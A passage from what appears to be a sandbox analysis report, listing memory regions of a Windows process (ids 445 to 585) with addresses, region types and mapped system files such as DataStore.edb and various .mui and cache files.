"c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 445 start_va = 0xcb8c6b0000 end_va = 0xcb8c6bffff entry_point = 0xcb8c6b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 446 start_va = 0xcb8c6c0000 end_va = 0xcb8c6cffff entry_point = 0xcb8c6c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 447 start_va = 0xcb8c6d0000 end_va = 0xcb8c6dffff entry_point = 0xcb8c6d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 448 start_va = 0xcb8c6e0000 end_va = 0xcb8c6effff entry_point = 0xcb8c6e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 449 start_va = 0xcb8c6f0000 end_va = 0xcb8c6fffff entry_point = 0xcb8c6f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 450 start_va = 0xcb8c700000 end_va = 0xcb8c70ffff entry_point = 0xcb8c700000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 451 start_va = 0xcb8c710000 end_va = 0xcb8c71ffff entry_point = 0xcb8c710000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 452 start_va = 0xcb8c720000 end_va = 0xcb8c72ffff entry_point = 0xcb8c720000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 453 start_va = 0xcb8c730000 end_va = 0xcb8c73ffff entry_point = 0xcb8c730000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 454 start_va = 0xcb8c740000 end_va = 0xcb8c74ffff entry_point = 0xcb8c740000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 455 start_va = 0xcb8c750000 end_va = 0xcb8c75ffff entry_point = 0xcb8c750000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 456 start_va = 0xcb8c760000 end_va = 0xcb8c76ffff entry_point = 0xcb8c760000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 457 start_va = 0xcb8c770000 end_va = 0xcb8c77ffff entry_point = 0xcb8c770000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 458 start_va = 0xcb8c780000 end_va = 0xcb8c78ffff entry_point = 0xcb8c780000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 459 start_va = 0xcb8c790000 end_va = 0xcb8c79ffff entry_point = 0xcb8c790000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 460 start_va = 0xcb8c7a0000 end_va = 0xcb8c7affff entry_point = 0xcb8c7a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 461 start_va = 0xcb8c7b0000 end_va = 0xcb8c7bffff entry_point = 0xcb8c7b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 462 start_va = 0xcb8c7c0000 end_va = 0xcb8c7cffff entry_point = 0xcb8c7c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 463 start_va = 0xcb8c7d0000 end_va = 0xcb8c7dffff entry_point = 0xcb8c7d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 464 start_va = 0xcb8c7e0000 end_va = 0xcb8c7effff entry_point = 0xcb8c7e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 465 start_va = 0xcb8c7f0000 end_va = 0xcb8c7fffff entry_point = 0xcb8c7f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 466 start_va = 0xcb8c800000 end_va = 0xcb8c80ffff entry_point = 0xcb8c800000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 467 start_va = 0xcb8c810000 end_va = 0xcb8c81ffff entry_point = 0xcb8c810000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 468 start_va = 0xcb8c820000 end_va = 0xcb8c82ffff entry_point = 0xcb8c820000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 469 start_va = 0xcb8c830000 end_va = 0xcb8c83ffff entry_point = 0xcb8c830000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 470 start_va = 0xcb8c840000 end_va = 0xcb8c84ffff entry_point = 0xcb8c840000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 471 start_va = 0xcb8c850000 end_va = 0xcb8c85ffff entry_point = 0xcb8c850000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 472 start_va = 0xcb8c860000 end_va = 0xcb8c86ffff entry_point = 0xcb8c860000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 473 start_va = 0xcb8c870000 end_va = 0xcb8c87ffff entry_point = 0xcb8c870000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 474 start_va = 0xcb8c880000 end_va = 0xcb8c88ffff entry_point = 0xcb8c880000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 475 start_va = 0xcb8c890000 end_va = 0xcb8c89ffff entry_point = 0xcb8c890000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 476 start_va = 0xcb8c8a0000 end_va = 0xcb8c8affff entry_point = 0xcb8c8a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 477 start_va = 0xcb8c8b0000 end_va = 0xcb8c8bffff entry_point = 0xcb8c8b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 478 start_va = 0xcb8c8c0000 end_va = 0xcb8c8cffff entry_point = 0xcb8c8c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 479 start_va = 0xcb8c8d0000 end_va = 0xcb8c8dffff entry_point = 0xcb8c8d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 480 start_va = 0xcb8c8e0000 end_va = 0xcb8c8effff entry_point = 0xcb8c8e0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 481 start_va = 0xcb8c8f0000 end_va = 0xcb8c8fffff entry_point = 0xcb8c8f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 482 start_va = 0xcb8c900000 end_va = 0xcb8c90ffff entry_point = 0xcb8c900000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 483 start_va = 0xcb8c910000 end_va = 0xcb8c91ffff entry_point = 0xcb8c910000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 484 start_va = 0xcb8c920000 end_va = 0xcb8c92ffff entry_point = 0xcb8c920000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 485 start_va = 0xcb8c930000 end_va = 0xcb8c93ffff entry_point = 0xcb8c930000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 486 start_va = 0xcb8c940000 end_va = 0xcb8c94ffff entry_point = 0xcb8c940000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 487 start_va = 0xcb8c950000 end_va = 0xcb8c95ffff entry_point = 0xcb8c950000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 488 start_va = 0xcb8c960000 end_va = 0xcb8c96ffff entry_point = 0xcb8c960000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 489 start_va = 0xcb8c970000 end_va = 0xcb8c97ffff entry_point = 0xcb8c970000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 490 start_va = 0xcb8c980000 end_va = 0xcb8c98ffff entry_point = 0xcb8c980000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 491 start_va = 0xcb8c990000 end_va = 0xcb8c99ffff entry_point = 0xcb8c990000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 492 start_va = 0xcb8c9a0000 end_va = 0xcb8c9affff entry_point = 0xcb8c9a0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 493 start_va = 0xcb8c9b0000 end_va = 0xcb8c9bffff entry_point = 0xcb8c9b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 494 start_va = 0xcb8c9c0000 end_va = 0xcb8c9cffff entry_point = 0xcb8c9c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 495 start_va = 0xcb8c9d0000 end_va = 0xcb8c9dffff entry_point = 0xcb8c9d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 496 start_va = 0xcb8c9e0000 end_va = 0xcb8cadffff entry_point = 0x0 region_type = private name = "private_0x000000cb8c9e0000" filename = "" Region: id = 497 start_va = 0xcb8cae0000 end_va = 0xcb8cbdffff entry_point = 0x0 region_type = private name = "private_0x000000cb8cae0000" filename = "" Region: id = 498 start_va = 0xcb8cbe0000 end_va = 0xcb8ccdffff entry_point = 0x0 region_type = private name = "private_0x000000cb8cbe0000" filename = "" Region: id = 499 start_va = 0xcb8cce0000 end_va = 0xcb8cddffff entry_point = 0x0 region_type = private name = "private_0x000000cb8cce0000" filename = "" Region: id = 500 start_va = 0xcb8cde0000 end_va = 0xcb8cedffff entry_point = 0x0 region_type = private name = "private_0x000000cb8cde0000" filename = "" Region: id = 501 start_va = 0xcb8cee0000 end_va = 0xcb8cfdffff entry_point = 0x0 region_type = private name = "private_0x000000cb8cee0000" filename = "" Region: id = 502 start_va = 0xcb8cfe0000 end_va = 0xcb8d0dffff entry_point = 0x0 region_type = private name = "private_0x000000cb8cfe0000" filename = "" Region: id = 503 start_va = 0xcbfc730000 end_va = 0xcbfc73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc730000" filename = "" Region: id = 504 start_va = 0xcbfc740000 end_va = 0xcbfc740fff entry_point = 0xcbfc740000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 505 start_va = 0xcbfc750000 end_va = 0xcbfc763fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc750000" filename = "" Region: id = 506 start_va = 0xcbfc770000 end_va = 0xcbfc7effff entry_point = 0x0 region_type = private name = "private_0x000000cbfc770000" filename = "" Region: id = 507 start_va = 0xcbfc7f0000 end_va = 0xcbfc7f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc7f0000" filename = "" Region: id = 508 start_va = 0xcbfc800000 end_va = 0xcbfc800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc800000" filename = "" Region: id = 509 start_va = 0xcbfc810000 end_va = 0xcbfc811fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc810000" filename = "" Region: id = 510 start_va = 0xcbfc820000 end_va = 0xcbfc8ddfff entry_point = 0xcbfc820000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 511 start_va = 0xcbfc960000 end_va = 0xcbfc960fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc960000" filename = "" Region: id = 512 start_va = 0xcbfc970000 end_va = 0xcbfc970fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc970000" filename = "" Region: id = 513 start_va = 0xcbfc980000 end_va = 0xcbfc980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc980000" filename = "" Region: id = 514 start_va = 0xcbfc990000 end_va = 0xcbfc990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc990000" filename = "" Region: id = 515 start_va = 0xcbfc9a0000 end_va = 0xcbfc9a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc9a0000" filename = "" Region: id = 516 start_va = 0xcbfc9b0000 end_va = 0xcbfc9b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfc9b0000" filename = "" Region: id = 517 start_va = 0xcbfc9c0000 end_va = 0xcbfc9ccfff entry_point = 0xcbfc9c0000 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 518 start_va = 0xcbfc9d0000 end_va = 0xcbfc9d6fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc9d0000" filename = "" Region: id = 519 start_va = 0xcbfc9e0000 end_va = 0xcbfc9ecfff entry_point = 0xcbfc9e0000 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 520 start_va = 0xcbfc9f0000 end_va = 0xcbfc9f6fff entry_point = 0x0 region_type = private name = "private_0x000000cbfc9f0000" filename = "" Region: id = 521 start_va = 0xcbfca00000 end_va = 0xcbfcafffff entry_point = 0x0 region_type = private name = "private_0x000000cbfca00000" filename = "" Region: id = 522 start_va = 0xcbfcb00000 end_va = 0xcbfcc87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfcb00000" filename = "" Region: id = 523 start_va = 0xcbfcc90000 end_va = 0xcbfcc93fff entry_point = 0xcbfcc90000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 524 start_va = 0xcbfcca0000 end_va = 0xcbfcca3fff entry_point = 0xcbfcca0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 525 start_va = 0xcbfccb0000 end_va = 0xcbfccb6fff entry_point = 0x0 region_type = private name = "private_0x000000cbfccb0000" filename = "" Region: id = 526 start_va = 0xcbfccc0000 end_va = 0xcbfccd0fff entry_point = 0xcbfccc0000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 527 start_va = 0xcbfcce0000 end_va = 0xcbfcce1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfcce0000" filename = "" Region: id = 528 start_va = 0xcbfccf0000 end_va = 0xcbfccf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfccf0000" filename = "" Region: id = 529 start_va = 0xcbfcd00000 end_va = 0xcbfcdfffff entry_point = 0x0 region_type = private name = "private_0x000000cbfcd00000" filename = "" Region: id = 530 start_va = 0xcbfce00000 end_va = 0xcbfcf80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfce00000" filename = "" Region: id = 531 start_va = 0xcbfcf90000 end_va = 0xcbfd04ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfcf90000" filename = "" Region: id = 532 start_va = 0xcbfd050000 end_va = 0xcbfd14ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd050000" filename = "" Region: id = 533 start_va = 0xcbfd150000 end_va = 0xcbfd1cffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd150000" filename = "" Region: id = 534 start_va = 0xcbfd1d0000 end_va = 0xcbfd1d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cbfd1d0000" filename = "" Region: id = 535 start_va = 0xcbfd200000 end_va = 0xcbfd2fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd200000" filename = "" Region: id = 536 start_va = 0xcbfd300000 end_va = 0xcbfd3fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd300000" filename = "" Region: id = 537 start_va = 0xcbfd400000 end_va = 0xcbfd736fff entry_point = 0xcbfd400000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 538 start_va = 0xcbfd740000 end_va = 0xcbfd83ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd740000" filename = "" Region: id = 539 start_va = 0xcbfd840000 end_va = 0xcbfd93ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd840000" filename = "" Region: id = 540 start_va = 0xcbfd940000 end_va = 0xcbfda3ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfd940000" filename = "" Region: id = 541 start_va = 0xcbfda40000 end_va = 0xcbfda82fff entry_point = 0xcbfda40000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000f.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db") Region: id = 542 start_va = 0xcbfda90000 end_va = 0xcbfdb1afff entry_point = 0xcbfda90000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 543 start_va = 0xcbfdb40000 end_va = 0xcbfdc3ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfdb40000" filename = "" Region: id = 544 start_va = 0xcbfdc40000 end_va = 0xcbfdd3ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfdc40000" filename = "" Region: id = 545 start_va = 0xcbfdd40000 end_va = 0xcbfddbffff entry_point = 0x0 region_type = private name = "private_0x000000cbfdd40000" filename = "" Region: id = 546 start_va = 0xcbfdde0000 end_va = 0xcbfdde6fff entry_point = 0x0 region_type = private name = "private_0x000000cbfdde0000" filename = "" Region: id = 547 start_va = 0xcbfde00000 end_va = 0xcbfdefffff entry_point = 0x0 region_type = private name = "private_0x000000cbfde00000" filename = "" Region: id = 548 start_va = 0xcbfdf00000 end_va = 0xcbfdffffff entry_point = 0x0 region_type = private name = "private_0x000000cbfdf00000" filename = "" Region: id = 549 start_va = 0xcbfe000000 end_va = 0xcbfe0fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe000000" filename = "" Region: id = 550 start_va = 0xcbfe100000 end_va = 0xcbfe17ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe100000" filename = "" Region: id = 551 start_va = 0xcbfe180000 end_va = 0xcbfe27ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe180000" filename = "" Region: id = 552 start_va = 0xcbfe300000 end_va = 0xcbfe37ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe300000" filename = "" Region: id = 553 start_va = 0xcbfe380000 end_va = 0xcbfe3fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe380000" filename = "" Region: id = 554 start_va = 0xcbfe400000 end_va = 0xcbfe4fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe400000" filename = "" Region: id = 555 start_va = 0xcbfe500000 end_va = 0xcbfe5fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe500000" filename = "" Region: id = 556 start_va = 0xcbfe600000 end_va = 0xcbfe6fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe600000" filename = "" Region: id = 557 start_va = 0xcbfe700000 end_va = 0xcbfe7fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe700000" filename = "" Region: id = 558 start_va = 0xcbfe800000 end_va = 0xcbfe8fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe800000" filename = "" Region: id = 559 start_va = 0xcbfe900000 end_va = 0xcbfe97ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe900000" filename = "" Region: id = 560 start_va = 0xcbfe980000 end_va = 0xcbfe9fffff entry_point = 0x0 region_type = private name = "private_0x000000cbfe980000" filename = "" Region: id = 561 start_va = 0xcbfea00000 end_va = 0xcbfea7ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfea00000" filename = "" Region: id = 562 start_va = 0xcbfea80000 end_va = 0xcbfeb7ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfea80000" filename = "" Region: id = 563 start_va = 0xcbfeb80000 end_va = 0xcbfec7ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfeb80000" filename = "" Region: id = 564 start_va = 0xcbfec80000 end_va = 0xcbfecfffff entry_point = 0x0 region_type = private name = "private_0x000000cbfec80000" filename = "" Region: id = 565 start_va = 0xcbfed00000 end_va = 0xcbfedfffff entry_point = 0x0 region_type = private name = "private_0x000000cbfed00000" filename = "" Region: id = 566 start_va = 0xcbfee00000 end_va = 0xcbfee7ffff entry_point = 0x0 region_type = private name = "private_0x000000cbfee00000" filename = "" Region: id = 567 start_va = 0xcbfef80000 end_va = 0xcbfeffffff entry_point = 0x0 region_type = private name = "private_0x000000cbfef80000" filename = "" Region: id = 568 start_va = 0xcbff070000 end_va = 0xcbff16ffff entry_point = 0x0 region_type = private name = "private_0x000000cbff070000" filename = "" Region: id = 569 start_va = 0xcbff170000 end_va = 0xcbff1effff entry_point = 0x0 region_type = private name = "private_0x000000cbff170000" filename = "" Region: id = 570 start_va = 0xcbff220000 end_va = 0xcbff226fff entry_point = 0x0 region_type = private name = "private_0x000000cbff220000" filename = "" Region: id = 571 start_va = 0xcbff230000 end_va = 0xcbff2affff entry_point = 0x0 region_type = private name = "private_0x000000cbff230000" filename = "" Region: id = 572 start_va = 0xcbff300000 end_va = 0xcbff3fffff entry_point = 0x0 region_type = private name = "private_0x000000cbff300000" filename = "" Region: id = 573 start_va = 0xcbff400000 end_va = 0xcbff4fffff entry_point = 0x0 region_type = private name = "private_0x000000cbff400000" filename = "" Region: id = 574 start_va = 0xcbff500000 end_va = 0xcbff57ffff entry_point = 0x0 region_type = private name = "private_0x000000cbff500000" filename = "" Region: id = 575 start_va = 0xcbff580000 end_va = 0xcbff5fffff entry_point = 0x0 region_type = private name = "private_0x000000cbff580000" filename = "" Region: id = 576 start_va = 0xcbff600000 end_va = 0xcbff67ffff entry_point = 0x0 region_type = private name = "private_0x000000cbff600000" filename = "" Region: id = 577 start_va = 0xcbff680000 end_va = 0xcbff77ffff entry_point = 0x0 region_type = private name = "private_0x000000cbff680000" filename = "" Region: id = 578 start_va = 0xcbff780000 end_va = 0xcbff87ffff entry_point = 0x0 region_type = private name = "private_0x000000cbff780000" filename = "" Region: id = 579 start_va = 0xcbff880000 end_va = 0xcbff8fffff entry_point = 0x0 region_type = private name = "private_0x000000cbff880000" filename = "" Region: id = 580 start_va = 0xcbff900000 end_va = 0xcbff9fffff entry_point = 0x0 region_type = private name = "private_0x000000cbff900000" filename = "" Region: id = 581 start_va = 0xcbffa00000 end_va = 0xcbffafffff entry_point = 0x0 region_type = private name = "private_0x000000cbffa00000" filename = "" Region: id = 582 start_va = 0xcbffb00000 end_va = 0xcbffbfffff entry_point = 0x0 region_type = private name = "private_0x000000cbffb00000" filename = "" Region: id = 583 start_va = 0xcbffc00000 end_va = 0xcbffcfffff entry_point = 0x0 region_type = private name = "private_0x000000cbffc00000" filename = "" Region: id = 584 start_va = 0xcbffd00000 end_va = 0xcbffddefff entry_point = 0xcbffd00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 585 start_va = 0xcbffde0000 end_va = 0xcbffedffff entry_point = 